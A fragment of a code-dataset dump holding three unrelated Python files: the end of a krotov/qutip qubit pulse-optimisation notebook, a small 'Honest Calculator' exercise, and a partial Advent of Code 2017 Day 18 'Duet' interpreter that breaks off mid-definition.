tensor((c[0]*basis(L,0) + c[1]*basis(L,1)).unit() , (basis(N,0)))\n else:\n ψ = tensor((basis(L,0)) , (c[0]*cat_0 + c[1]*cat_1).unit())\n return ψ\n\n# Feeds a list of coeffients into the function above\ndef states(coeffs):\n return [[coeffs_to_state(c,True),coeffs_to_state(c,False)] for c in coeffs]\n\n\n# In[ ]:\n\n\nH = hamiltonian(ampl0=1, use_rotating=True, phase=np.exp(-1j*ω_q*T))\nϕ = [[ basis(L,0), basis(L,1) ]] # Initial and target state\nF_err = 1e-5 # Infidelity goal\nF_oc_tar = 1-F_err # Fidelity goal\n\n\n# Next, we define the optimization targets, which is technically a list of\n# objectives, but here it has just one entry defining a simple state-to-state\n# transfer\n# from initial state $\\ket{\\Psi_{\\init}} = \\ket{0}$ to the target state\n# $\\ket{\\Psi_{\\tgt}} = \\ket{1}$, which we want to reach at final time $T$. Note\n# that we also have to pass the Hamiltonian $\\op{H}(t)$ that determines the\n# dynamics of\n# the system to the optimization objective.\n\n# In[ ]:\n\n\n# Rotates the target states into the rotating frame\ndef state_rot(ϕ, T):\n ϕ = copy.deepcopy(ϕ)\n if np.sum(np.array(ϕ[0][1].full())==0) != L-1:\n if L == 3:\n rot_evo = qutip.Qobj([[1, 0, 0],[0, np.exp(-1j * ω_q * T), 0],[0, 0, 0]])\n else:\n rot_evo = qutip.Qobj([[1, 0],[0, np.exp(-1j * ω_q * T)]])\n \n ϕ[0][1] = rot_evo * ϕ[0][1]\n return ϕ\n\nif use_rotating:\n objectives = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H) for ψ in state_rot(copy.deepcopy(ϕ), T)]\nelse:\n objectives = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H) for ψ in ϕ]\n\n\n# In[ ]:\n\n\ndef S(t, T=6*σ, σ=σ):\n rise_time = 2\n return amp_max*krotov.shapes.flattop(t, t_start=0, t_stop=T, t_rise=rise_time, t_fall=rise_time, func='sinsq')\n\ndef start_pulse(t, T=6*σ, σ=σ):\n if σ is not None:\n return pulse_max(σ)*krotov.shapes.blackman(t, t_start=0, t_stop=6*σ)\n else:\n return krotov.shapes.blackman(t, t_start=0, t_stop=T)\ndef zero_pulse(t, T=T, σ=4):\n return 0\ndef unit_pulse(t, T=T, σ=4):\n return 1\n\ndef shape_field(ϵ, sf, T, σ):\n \"\"\"Applies the shape function S(t) to the guess field\"\"\"\n ϵ_shaped = lambda t, args: ϵ(t, args)*sf(t, T=T, σ=σ)\n return ϵ_shaped\n\nS_unit = [unit_pulse,unit_pulse]\nS_zero = [zero_pulse,zero_pulse]\nS_start = [lambda t, T=T, σ=σ: 0.01*unit_pulse(t, T=T, σ=σ),start_pulse]\nS_start = [zero_pulse, start_pulse]\nS_funs = [S,S]\nfor i, H_i in enumerate(H[1:]):\n H_i[1] = shape_field(H_i[1], S_start[i], T, σ)\n\n\n# ## Simulate dynamics of the guess pulse\n# \n# Before heading towards the optimization\n# procedure, we first simulate the\n# dynamics under the guess pulses.\n\n# In[ ]:\n\n\nfor H_i in H[1:]:\n plot_pulse(H_i[1], tlist)\n\n\n# In[ ]:\n\n\nguess_dynamics = [ob.mesolve(tlist, progress_bar=True, options=qutip.Options(nsteps=50000)) for ob in objectives]\n\n\n# In[ ]:\n\n\nqubit_occupation(guess_dynamics[0])\n\n\n# In[ ]:\n\n\nplot_evolution(guess_dynamics, steps=5)\n\n\n# In[ ]:\n\n\nqubit_pulses = [H[2][1](t, 0) for t in tlist]\n#qubit_pulses_filtered = apply_spectral_filter(copy.deepcopy(qubit_pulses), tlist, 0, 0.5)\nplot_spectrum(qubit_pulses, tlist, mark_freq=[0, -K_q, -K_q/2], pos=0, xlim=[-2*π,2*π])\n#plot_spectrum(qubit_pulses_filtered, tlist, mark_freq=[0, K_q], pos=0, xlim=[-2*K_q,2*K_q])\n#plot_pulse(qubit_pulses, tlist)\n#plot_pulse(qubit_pulses_filtered, tlist)\n#plot_spectrum(qubit_pulses[1], time_list, mark_freq=[ω_q, ω_q + K_q, ω_q - K_q], pos=0)\n\n\n# ## Optimize\n\n# In[ ]:\n\n\n# Frequency limits for spectral filter (not used)\nω_0 = 0\nω_1 = np.abs(K_q/2)\n\n\n# In[ ]:\n\n\ndef modify_params(**kwargs):\n \n spectral_filtering = False\n \n if spectral_filtering:\n # Spectral filtering\n tlist = kwargs['tlist']\n dt = tlist[1] - tlist[0] # assume equi-distant time grid\n n = len(tlist) - 1 # = len(pulse)\n # remember that pulses are defined on intervals of tlist\n ω = np.abs(np.fft.fftfreq(n, d=dt / (2.0 * π)))\n # the normalization factor 2π means that w0 and w1 are angular\n # frequencies, corresponding directly to energies in the Hamiltonian\n # (ħ = 1).\n flt = (ω_0 <= ω) * (ω <= ω_1)\n # flt is the (boolean) filter array, equivalent to an array of values 0\n # and 1 \n\n shape_arrays = kwargs['shape_arrays']\n for (i, (pulse, shape)) in enumerate(zip(kwargs['optimized_pulses'], shape_arrays)):\n spectrum = np.fft.fft(pulse)\n # apply the filter by element-wise multiplication\n spectrum[:] *= flt[:]\n # after the inverse fft, we should also multiply with the\n # update shape function. Otherwise, there is no guarantee that\n # the filtered pulse will be zero at t=0 and t=T (assuming that\n # is what the update shape is supposed to enforce). Also, it is\n # important that we overwrite `pulse` in-place (pulse[:] = ...)\n kwargs['optimized_pulses'][i][:] = np.fft.ifft(spectrum).real * shape\n \n # Limit pulse amplitude to 1\n for i in range(len(kwargs['optimized_pulses'])):\n #kwargs['optimized_pulses'][i] = savgol_filter(kwargs['optimized_pulses'][i], 9, 2) # Smooth pulse\n \n pulse_max = np.max(np.abs(kwargs['optimized_pulses'][i]))\n if pulse_max > amp_max:\n kwargs['optimized_pulses'][i] = (amp_max*np.array(kwargs['optimized_pulses'][i])/pulse_max)\n kwargs['optimized_pulses'][i] = np.fmax(np.fmin(kwargs['optimized_pulses'][i], kwargs['shape_arrays'][i]), -np.array(kwargs['shape_arrays'][i]))\n \n #conv = 3*σ\n #if (conv % 2 == 0): conv += 1\n #kwargs['optimized_pulses'][i] = savgol_filter(kwargs['optimized_pulses'][i], conv, 2)\n # Plot pulse shapes every 50th iteration\n #if kwargs['iteration'] % 50 == 0:\n # plot_pulse(kwargs['optimized_pulses'][i], kwargs['tlist'][:-1], kwargs['tlist'][-1])\n # plot_spectrum(kwargs['optimized_pulses'][i], kwargs['tlist'][:-1], mark_freq=[0, -K_q, -K_q/2], mark_color=['r','g','b'], pos=0, xlim=[-(2*π), (2*π)])\n # Update λ\n #fac = 1\n #steps = 5\n #λₐ = kwargs['lambda_vals'][0]\n #for i in range(len(kwargs['lambda_vals'])):\n # kwargs['lambda_vals'][i] = λₐ * fac\n # lambda_a = λₐ * fac\n #print(\"λₐ = {}\".format(kwargs['lambda_vals']))\n\n\n# In[ ]:\n\n\n# Reset results\nopt_result = None\n\n\n# In[ ]:\n\n\ndef convergence_reason(opt_result):\n if opt_result == None:\n return True\n reasons = ['monotonic', 'iterations']\n for r in reasons:\n if opt_result.message.find(r)>0:\n return r\n if opt_result.message.find('F_oc')>0 or opt_result.message.find('Δ')>0:\n return False\n\n\n# In[ ]:\n\n\ndef run_optim(T, lambda_a, ϕ):\n σ = T/6\n opt_result = None\n print('T = {}'.format(T))\n sample_rate = 4 # Gigasamples/s\n tlist = np.linspace(0, T, samples_rate*int(np.ceil(T)))\n s_pulse = None\n H = hamiltonian(ampl0=1, use_rotating=True, start_pulse=s_pulse, T=T, phase=np.exp(-1j*ω_q*T))\n \n S_start = [zero_pulse, start_pulse]\n S_funs = [S, S]\n for i, H_i in enumerate(H[1:]):\n H_i[1] = shape_field(H_i[1], S_start[i], T, σ)\n #H_i[1] = shape_field(H_i[1], S_funs[i], T, σ)\n plot_pulse(H_i[1], tlist)\n \n objectives = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H) for ψ in state_rot(ϕ, T)]\n \n # Check if guess pulse realises\n guess_dynamics = [ob.mesolve(tlist, options=qutip.Options(nsteps=50000)) for ob in objectives]\n final_state = guess_dynamics[0].states[-1]\n dm = final_state * ϕ[0][1].dag()\n fid = np.abs((final_state.dag() * ϕ[0][1]).full()[0][0])**2\n if fid > F_oc_tar:\n print('Guess pulse realises transfer already.')\n return True\n \n pulse_options = {H_i[1]: dict(lambda_a=lambda_a, shape=lambda t: S_funs[i](t, T=T, σ=σ)) for i, H_i in enumerate(H[1:])}\n #pulse_options = {\n # H[2][1]: dict(lambda_a=lambda_a, shape=0),\n # H[1][1]: dict(lambda_a=lambda_a, shape=lambda t: S_funs[0](t, T=T, σ=σ)), \n #}\n while convergence_reason(opt_result):\n if convergence_reason(opt_result) == 'monotonic':\n break\n #lambda_a *= 2\n # print('λₐ = {}'.format(lambda_a))\n # pulse_options = {H_i[1]: dict(lambda_a=lambda_a, shape=lambda t: S_funs[i](t, T)) for i, H_i in enumerate(H[1:])}\n #iters = 5\n #if opt_result is not None:\n # iters = opt_result.iters[-1] + iters\n\n opt_result = krotov.optimize_pulses(\n objectives,\n pulse_options=pulse_options,\n tlist=tlist,\n propagator=krotov.propagators.expm,\n chi_constructor=krotov.functionals.chis_ss,\n info_hook=krotov.info_hooks.chain(\n krotov.info_hooks.print_table(J_T=F_oc),\n print_fidelity\n ),\n check_convergence=krotov.convergence.Or(\n krotov.convergence.value_above(F_oc_tar, name='F_oc'),\n krotov.convergence.delta_below(1e-9),\n #krotov.convergence.check_monotonic_fidelity,\n ),\n modify_params_after_iter = modify_params,\n #iter_stop=1,\n continue_from = opt_result,\n store_all_pulses=True,\n )\n print(opt_result.message)\n opt_result.dump(os.path.join(os.getcwd(),'results','{}_pi_pulse_optim_{}.dat'.format(current_time(),T)))\n\n\n# In[ ]:\n\n\nstep_size = pulse_max(0)*2. # Higher numbers can lead to instability while lower can make convergence much slower\nλ = 1/step_size\nϕ = [[ basis(L,0), (basis(L,1)).unit() ]] # Initial and target states\n\nexisting_times = [float(file.split('_')[4][:-4]) for file in os.listdir('results')]\nt_times = np.flip(np.arange(1,21.5,1)) # List of pulse lengths to optimise for\n#t_times = [55.]\n\nfor tot in t_times:\n if tot not in [float(file.split('_')[4][:-4]) for file in os.listdir('results')]:\n #plot_cardinal(state_rot(ϕ, tot)[0])\n if tot.is_integer():\n tot = int(tot)\n run_optim(tot, λ, ϕ)\n else:\n print('T = {} already exists'.format(tot))\n\n\n# ## Plot optimized results (unused)\n\n# In[ ]:\n\n\nfolder = 'best_results_ge' # best_results_ge or best_results_gf\nresults = [(krotov.result.Result.load(os.path.join(os.getcwd(),folder,file), objectives=get_objectives(T=float(file.split('_')[-1][:-4]))), float(file.split('_')[-1][:-4])) for file in os.listdir(folder) if file[-4:]=='.dat']\nget_ipython().run_line_magic('matplotlib', 'inline')\n#%matplotlib notebook\n#print(vars(results[0][0]))\n#plot_results_3d(results)\n#ax = plot_results_pulse_length(results, iteration=0, shape='.',color='g')\n#ax = plot_results_pulse_length(results, iteration=10000, shape='.', ax=ax)\n#ax.legend(['1st iter.','Last iter.'])\n#ax.legend(('1st iter.', 'Last iter.'))\n#plot_results_iteration(results)\nplot_results_pulse_length_iterations(results)\n#matplotlib2tikz.save(\"fidelity-length-gf.tikz\")\n\n\n# In[ ]:\n\n\nfor i in range(len(results)+1):\n ax = plot_results_pulse_length(results, iteration=i)\n ax.set_title('Iteration {}'.format(i))\n plt.savefig('gif/{}.png'.format(i))\n ax.clear()\n\n\n# In[ ]:\n\n\ndef plot_pulse_both(pulse, pulse2, tlist, T=None):\n fig, ax = plt.subplots(2,1,figsize=(7.5,8))\n if callable(pulse):\n pulse = np.array([pulse(t, args=None) for t in tlist])\n if np.any(np.iscomplex(pulse)):\n ax[0].plot(tlist, np.real(pulse))\n ax[0].plot(tlist, np.imag(pulse))\n ax[0].legend(['Re', 'Im'])\n else:\n ax[0].plot(tlist, pulse)\n if T is not None:\n ax[0].plot(tlist, [S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n ax[0].plot(tlist, [-S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n #ax[0].set_xlabel('Time (ns)')\n ax[0].set_ylabel('Re($\\Omega$)')\n ax[0].set_ylim([-amp_max*1.05,amp_max*1.05])\n \n if callable(pulse2):\n pulse = np.array([pulse2(t, args=None) for t in tlist])\n if np.any(np.iscomplex(pulse2)):\n ax[1].plot(tlist, np.real(pulse2))\n ax[1].plot(tlist, np.imag(pulse2))\n ax[1].legend(['Re', 'Im'])\n else:\n ax[1].plot(tlist, pulse2)\n if T is not None:\n ax[1].plot(tlist, [S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n ax[1].plot(tlist, [-S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n ax[1].set_xlabel('Time (ns)')\n ax[1].set_ylabel('Im($\\Omega$)')\n ax[1].set_ylim([-amp_max*1.05,amp_max*1.05])\n return fig\n\n\n# In[ ]:\n\n\n\nr = results[1][0]\ntilist = r.tlist[0:-1]\nfor i in range(len(r.all_pulses)):\n fig = plot_pulse_both(r.all_pulses[i][0], r.all_pulses[i][1], tilist)\n fig.axes[0].set_title('Iteration {}'.format(i))\n fig.savefig('gif/{}.png'.format(i))\n plt.close()\n# ax.clear()\n\n\n# In[ ]:\n\n\nplot_results_pulse_length(results, iteration=20, ax=ax)\nax = plt.axes()\ndef interactive_plot(iteration):\n plot_results_pulse_length(results, iteration=iteration, ax=ax)\ninteract(interactive_plot, iteration=widgets.IntSlider(min=0,max=900,step=1,value=0));\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# # Analyze\n\n# In[ ]:\n\n\nfolder = 'best_results_ge'\n#ϕ = [[ basis(L,0), basis(L,1) ]]\nresults = [(krotov.result.Result.load(os.path.join(os.getcwd(),folder,file), objectives=get_objectives(T=float(file.split('_')[-1][:-4]))), float(file.split('_')[-1][:-4])) for file in os.listdir(folder) if file[-4:]=='.dat']\n#results = [(krotov.result.Result.load(os.path.join(os.getcwd(),folder,file)), float(file.split('_')[-1][:-4])) for file in os.listdir(folder) if file[-4:]=='.dat']\nresults = sorted(results, key=lambda x : x[1])\nprint(len(results))\nidx_list = [0,7,15,23,63,-1] # 0->1\n#idx_list = [0,2,4,6,7,-1] # 0->2\nres = []\nfor i in idx_list:\n res = res+[results[i]]\nresults = res\nfor T in results:\n print(T[1])\n #print(len(T[0].tau_vals))\n #if T[0].message[21] is 'F':\n # print(T[1])\n\n\n# In[ ]:\n\n\n#T_q = (2*π)/ω_q\nsteps2 = len(results[0][0].tlist)*1000\nlightness = 1\nfor (r,T) in results:\n tlist = r.tlist\n #opt_dynamics = [ob.mesolve(tlist, progress_bar=True) for ob in r.objectives]\n #qubit_occupation(opt_dynamics[0])\n \n \n c = r.optimized_controls\n tlist2 = np.linspace(0, tlist[-1], steps2)\n Ω = c[0]+1j*c[1]\n #puls = np.abs(Ω)\n #fas = np.angle(Ω)\n Ω = np.interp(tlist2, tlist, Ω)\n pulses_lab = [np.conj(Ω)*np.exp(1j*ω_q*tlist2), np.conj(Ω)*np.exp(-1j*ω_q*tlist2)]\n \n #opt_dynamics = [ob.mesolve(tlist, progress_bar=True) for ob in r.optimized_objectives]\n '''\n fig = plot_pulse(r.guess_controls[0], tlist)\n fig = plot_pulse(c[0], tlist, fig=fig)\n fig.axes[0].set_ylabel('Re($\\Omega$)')\n #fig.axes[0].legend(['Guess', 'Optim.'])\n matplotlib2tikz.save(\"../Figures/Results/pulse_shape_{}_Real.tikz\".format(str(T).replace('.',',')),\n figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\n \n fig = plot_pulse(r.guess_controls[1], tlist)\n fig = plot_pulse(c[1], tlist, fig=fig)\n fig.axes[0].set_ylabel('Re($\\Omega$)')\n fig.axes[0].legend(['Guess', 'Optim.'])\n matplotlib2tikz.save(\"../Figures/Results/pulse_shape_{}_Imag.tikz\".format(str(T).replace('.',',')),\n figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\n '''\n #qubit_occupation(opt_dynamics[0])\n #matplotlib2tikz.save(\"../Figures/Results/qubit_occ_{}.tikz\".format(str(T).replace('.',',')),\n # figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\n \n col = lightness*np.array([0.121569, 0.466667, 0.705882])\n if T==22.0 or T==4.25:\n fig = plot_spectrum(pulses_lab[0], tlist2, mark_freq=[ω_q+K_q, ω_q, ω_q-K_q],mark_color=[u'#1f77b4', u'#ff7f0e', u'#2ca02c'], pos=0, xlim=[ω_q*0.8, ω_q*1.2], col=col)\n elif T==55. or T==30.:\n fig = plot_spectrum(pulses_lab[0], tlist2, mark_freq=[ω_q+K_q, ω_q, ω_q-K_q],mark_color=[u'#1f77b4', u'#ff7f0e', u'#2ca02c'], pos=0, xlim=[ω_q*0.8, ω_q*1.2], fig = fig,col=col)\n else:\n fig = plot_spectrum(pulses_lab[0], tlist2, xlim=[ω_q*0.8, ω_q*1.2], fig = fig,col=col)\n #fig.axes[0].set_title('Spectrum of pulse (lab frame)')\n #fig.axes[0].legend(['Spec.',r'$\\omega_{01}$',r'$\\omega_{12}$',r'$\\omega_{02}$'])\n #matplotlib2tikz.save(\"../Figures/Results/pulse_spectrum_{}.tikz\".format(str(T).replace('.',',')),\n # figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\n lightness -= 0.1\n \n '''\n final_state = opt_dynamics[0].states[-1]\n #target_state = r.objectives[0].target\n fig, ax = qutip.visualization.hinton(final_state*final_state.dag())\n matplotlib2tikz.save(\"../Figures/Results/hinton_gf_{}.tikz\".format(str(T).replace('.',',')),\n figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\n \n fig = plot_evolution(opt_dynamics)\n fig.save(name=\"../Figures/Results/bloch_evolution_{}.png\".format(str(T).replace('.',',')))\n #fig = plot_spectrum(pulses_lab[1], tlist2, mark_freq=[-ω_q, -ω_ef, -ω_gf],mark_color=['r','g','b'], pos=0, xlim=[-ω_q*0.8, -ω_q*1.2])\n #fig.axes[0].set_title('Spectrum of Im($\\omega$)')\n #fig.axes[0].legend(['Spec.',r'$\\omega_{01}$',r'$\\omega_{12}$',r'$\\omega_{02}$'])\n #H_lab = hamiltonian(ampl0=1, use_rotating=False, pulses=pulses_lab)\n #objectives_lab = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H_lab) for ψ in ϕ]\n '''\n#fig.axes[0].legend(['22 ns','000','000','000','24 ns','26 ns','28 ns','29 ns','55 ns']);\nfig.axes[0].legend(['4.25 ns','000','000','000','10 ns','30 ns','10 ns','20 ns','30 ns']);\nfig.axes[0].set_title('Spectrum of pulse (lab frame)');\nfig.axes[0].set_ylabel('Pulse amplitude');\n#fig.axes[0].legend(['Spec.',r'$\\omega_{01}$',r'$\\omega_{12}$',r'$\\omega_{02}$'])\nmatplotlib2tikz.save(\"../Figures/Results/pulse_spectrum_qubit.tikz\",\n figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\nsubprocess.call(\"../Figures/Results/move_files.sh\", shell=False)\n\n\n# In[ ]:\n\n\n# Move figures to Latex folder\n#os.system(['wsl.exe','../Figures/Results/move_files.sh'])\nsubprocess.call(\"../Figures/Results/move_files.sh\", shell=False)\n\n\n# In[ ]:\n\n\nxlabels = ['$|0\\\\rangle$','$|1\\\\rangle$','$|2\\\\rangle$']\nylabels = ['$\\\\langle 0|$','$\\\\langle 1|$','$\\\\langle 2|$']\n#final_state = desuperposition(opt_dynamics[0].states[-1], F_err)\n\n#target_state = results[0][0].objectives[0].target\nplot_matrix_final_target(target_state, final_state, xlabels, ylabels, el=45, az=150)\nplot_matrix_final_target(target_state, final_state, xlabels, ylabels, el=10, az=150)\nplot_cardinal([target_state, final_state])\nplot_evolution(opt_dynamics)\n\n#cmap = matplotlib.cm.RdBu\n#norm = matplotlib.colors.Normalize(-1, 1)\n#matplotlib.colorbar.ColorbarBase(fig.axes[1], norm=norm, cmap=cmap);\n\n\n# In[ ]:\n\n\nT_q = (2*π)/ω_q\nsteps2 = len(results[0][0].tlist)*1000\nfor (r,_) in results:\n tlist = r.tlist\n #opt_dynamics = [ob.mesolve(tlist, progress_bar=True) for ob in r.objectives]\n #qubit_occupation(opt_dynamics[0])\n \n c = r.optimized_controls\n tlist2 = np.linspace(0, tlist[-1], steps2)\n Ω = c[0]+1j*c[1]\n Ω = np.interp(tlist2, tlist, Ω)\n pulses_lab = [Ω*np.exp(1j*ω_q*tlist2), np.conj(Ω)*np.exp(-1j*ω_q*tlist2)]\n opt_dynamics = [ob.mesolve(tlist, progress_bar=True) for ob in r.optimized_objectives]\n plot_pulse(r.guess_controls[0], tlist)\n print(np.max(r.guess_controls[1]))\n plot_pulse(r.guess_controls[1], tlist)\n plot_pulse(c[0], tlist)\n plot_pulse(c[1], tlist)\n plot_pulse(pulses_lab[0], tlist2)\n plot_pulse(pulses_lab[1], tlist2)\n qubit_occupation(opt_dynamics[0])\n plot_spectrum(pulses_lab[0], tlist2, mark_freq=[ω_q, ω_ef, ω_gf],mark_color=['r','g','b'], pos=0, xlim=[ω_q*0.9, ω_q*1.1])\n #plot_spectrum(pulses_lab[1], tlist2, mark_freq=[ω_q, ω_ef, ω_gf], pos=0, xlim=[-ω_q*0.95, -ω_q*1.05])\n #H_lab = hamiltonian(ampl0=1, use_rotating=False, pulses=pulses_lab)\n #objectives_lab = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H_lab) for ψ in ϕ]\n \n \n\n","repo_name":"JohanWinther/cat-state-encoding","sub_path":"Krotov/Pi Pulse test only qubit.py","file_name":"Pi Pulse test only qubit.py","file_ext":"py","file_size_in_byte":33860,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"74745491089","text":"# write your code here\ndef is_one_digit(v):\n try:\n if not float(v).is_integer():\n return False\n except ValueError:\n return False\n else:\n if -10 < v < 10:\n return True\n else:\n return False\n\n\ndef check(v_1, v_2, v_3):\n msg = \"\"\n if is_one_digit(v_1) and is_one_digit(v_2):\n msg += \" ... lazy\"\n if (v_1 == 1 or v_2 == 1) and v_3 == \"*\":\n msg += \" ... very lazy\"\n if (v_1 == 0 or v_2 == 0) and (v_3 in [\"*\", \"+\", \"-\"]):\n msg += \" ... very, very lazy\"\n if msg != \"\":\n msg = \"You are\" + msg\n print(msg)\n\n\nnumbers_correct = False\noperation_correct = False\ndivision_by_zero = True\nmemory = 0\nresult = 0\nwhile not numbers_correct and not operation_correct and division_by_zero:\n print(\"Enter an equation\")\n calc = input()\n x, operation, y = calc.split()\n if x == \"M\":\n x = memory\n if y == \"M\":\n y = memory\n try:\n x = float(x)\n except ValueError:\n print(\"Do you even know what numbers are? Stay focused!\")\n else:\n try:\n y = float(y)\n except ValueError:\n print(\"Do you even know what numbers are? Stay focused!\")\n else:\n numbers_correct = True\n if numbers_correct:\n if operation != \"+\" and operation != \"-\" and operation != \"*\" and operation != \"/\":\n print(\"Yes ... an interesting math operation. You've slept through all classes, haven't you?\")\n numbers_correct = False\n else:\n operation_correct = True\n if operation_correct:\n check(x, y, operation)\n if operation == \"+\":\n result = x + y\n division_by_zero = False\n elif operation == \"-\":\n result = x - y\n division_by_zero = False\n elif operation == \"*\":\n result = x * y\n division_by_zero = False\n elif operation == \"/\" and y != 0:\n result = x / y\n division_by_zero = False\n else:\n print(\"Yeah... division by zero. Smart move...\")\n numbers_correct = False\n operation_correct = False\n ask_memory = True\n if not (not numbers_correct and not operation_correct and division_by_zero):\n while ask_memory:\n print(result)\n print(\"Do you want to store the result? (y / n):\")\n answer = input()\n if answer == \"y\":\n if is_one_digit(result):\n msg_index = 10\n print(\"Are you sure? It is only one digit! (y / n)\")\n reply = input()\n while reply not in [\"y\", \"n\"]:\n print(\"Are you sure? It is only one digit! (y / n)\")\n reply = input()\n if reply == \"y\":\n print(\"Don't be silly! It's just one number! Add to the memory? (y / n)\")\n reply = input()\n while reply not in [\"y\", \"n\"]:\n print(\"Don't be silly! It's just one number! Add to the memory? (y / n)\")\n reply = input()\n if reply == \"y\":\n print(\"Last chance! Do you really want to embarrass yourself? (y / n)\")\n reply = input()\n while reply not in [\"y\", \"n\"]:\n print(\"Last chance! Do you really want to embarrass yourself? (y / n)\")\n reply = input()\n memory = result\n else:\n memory = result\n ask_memory = False\n else:\n if answer == \"n\":\n ask_memory = False\n proper_answer = False\n while not proper_answer:\n print(\"Do you want to continue calculations? (y / n):\")\n continue_calcs = input()\n if continue_calcs == \"y\":\n proper_answer = True\n numbers_correct = False\n operation_correct = False\n division_by_zero = True\n elif continue_calcs == \"n\":\n proper_answer = True\n","repo_name":"jritxal/Honest-Calculator-Phyton-JBA-","sub_path":"Honest Calculator/task/honest_calc.py","file_name":"honest_calc.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28371875603","text":"# --- Day 18: Duet ---\n\n# You discover a tablet containing some strange assembly code labeled simply\n# \"Duet\". Rather than bother the sound card with it, you decide to run the code\n# yourself. Unfortunately, you don't see any documentation, so you're left to\n# figure out what the instructions mean on your own.\n\n# It seems like the assembly is meant to operate on a set of registers that are\n# each named with a single letter and that can each hold a single integer. You\n# suppose each register should start with a value of 0.\n\n# There aren't that many instructions, so it shouldn't be hard to figure out\n# what they do. Here's what you determine:\n\n# snd X plays a sound with a frequency equal to the value of X.\n\n# set X Y sets register X to the value of Y.\n\n# add X Y increases register X by the value of Y.\n\n# mul X Y sets register X to the result of multiplying the value contained in\n# register X by the value of Y.\n\n# mod X Y sets register X to the remainder of dividing the value contained in\n# register X by the value of Y (that is, it sets X to the result of X modulo\n# Y).\n\n# rcv X recovers the frequency of the last sound played, but only when the\n# value of X is not zero. (If it is zero, the command does nothing.)\n\n# jgz X Y jumps with an offset of the value of Y, but only if the value of X is\n# greater than zero. (An offset of 2 skips the next instruction, an offset of\n# -1 jumps to the previous instruction, and so on.)\n\n# Many of the instructions can take either a register (a single letter) or a\n# number. The value of a register is the integer it contains; the value of a\n# number is that number.\n\n# After each jump instruction, the program continues with the instruction to\n# which the jump jumped. After any other instruction, the program continues\n# with the next instruction. Continuing (or jumping) off either end of the\n# program terminates it.\n\n# For example:\n\n# set a 1\n# add a 2\n# mul a a\n# mod a 5\n# snd a\n# set a 0\n# rcv a\n# jgz a -1\n# set a 1\n# jgz a -2\n\n# The first four instructions set a to 1, add 2 to it, square it, and then set\n# it to itself modulo 5, resulting in a value of 4.\n\n# Then, a sound with frequency 4 (the value of a) is played.\n\n# After that, a is set to 0, causing the subsequent rcv and jgz instructions to\n# both be skipped (rcv because a is 0, and jgz because a is not greater than\n# 0).\n\n# Finally, a is set to 1, causing the next jgz instruction to activate, jumping\n# back two instructions to another jump, which jumps again to the rcv, which\n# ultimately triggers the recover operation.\n\n# At the time the recover operation is executed, the frequency of the last\n# sound played is 4.\n\n# What is the value of the recovered frequency (the value of the most recently\n# played sound) the first time a rcv instruction is executed with a non-zero\n# value?\n\n# --- Part Two ---\n\n# As you congratulate yourself for a job well done, you notice that the\n# documentation has been on the back of the tablet this entire time. While you\n# actually got most of the instructions correct, there are a few key\n# differences. This assembly code isn't about sound at all - it's meant to be\n# run twice at the same time.\n\n# Each running copy of the program has its own set of registers and follows the\n# code independently - in fact, the programs don't even necessarily run at the\n# same speed. To coordinate, they use the send (snd) and receive (rcv)\n# instructions:\n\n# snd X sends the value of X to the other program. These values wait in a queue\n# until that program is ready to receive them. Each program has its own message\n# queue, so a program can never receive a message it sent.\n\n# rcv X receives the next value and stores it in register X. If no values are\n# in the queue, the program waits for a value to be sent to it. Programs do not\n# continue to the next instruction until they have received a value. Values are\n# received in the order they are sent.\n\n# Each program also has its own program ID (one 0 and the other 1); the\n# register p should begin with this value.\n\n# For example:\n\n# snd 1\n# snd 2\n# snd p\n# rcv a\n# rcv b\n# rcv c\n# rcv d\n\n# Both programs begin by sending three values to the other. Program 0 sends 1,\n# 2, 0; program 1 sends 1, 2, 1. Then, each program receives a value (both 1)\n# and stores it in a, receives another value (both 2) and stores it in b, and\n# then each receives the program ID of the other program (program 0 receives 1;\n# program 1 receives 0) and stores it in c. Each program now sees a different\n# value in its own copy of register c.\n\n# Finally, both programs try to rcv a fourth time, but no data is waiting for\n# either of them, and they reach a deadlock. When this happens, both programs\n# terminate.\n\n# It should be noted that it would be equally valid for the programs to run at\n# different speeds; for example, program 0 might have sent all three values and\n# then stopped at the first rcv before program 1 executed even its first\n# instruction.\n\n# Once both of your programs have terminated (regardless of what caused them to\n# do so), how many times did program 1 send a value?\n\n################################################################################\n\nimport asyncio\nimport collections\n\ndef run(registers, instructions):\n def snd(x):\n registers['snd'] = arg_value(x)\n def set(x, y):\n registers[x] = arg_value(y)\n def add(x, y):\n registers[x] += arg_value(y)\n def mul(x, y):\n registers[x] *= arg_value(y)\n def mod(x, y):\n registers[x] %= arg_value(y)\n def rcv(x):\n if arg_value(x) != 0:\n registers['rcv'] = registers['snd']\n def jgz(x, y):\n if arg_value(x) > 0:\n return arg_value(y)\n else:\n return None\n def arg_value(x):\n if len(x) == 1 and x.isalpha():\n return registers[x]\n else:\n return int(x)\n\n pc = 0\n while pc < len(instructions):\n cmd, args = instructions[pc]\n operation = locals()[cmd]\n jump = operation(*args)\n if jump is not None:\n pc += jump\n else:\n pc += 1\n if registers['rcv'] != 0:\n break\n\nclass Deadlock(Exception): pass\n \nclass DuetCPU:\n def __init__(self, program_id):\n self.program_id = program_id\n self.registers = collections.defaultdict(lambda: 0)\n self.registers['p'] = program_id\n self.rcv_queue = asyncio.Queue()\n self.rcv_waiting = False\n self.snd_count = 0\n\n @property\n def is_blocking(self):\n return self.rcv_waiting and self.rcv_queue.empty()\n\n async def 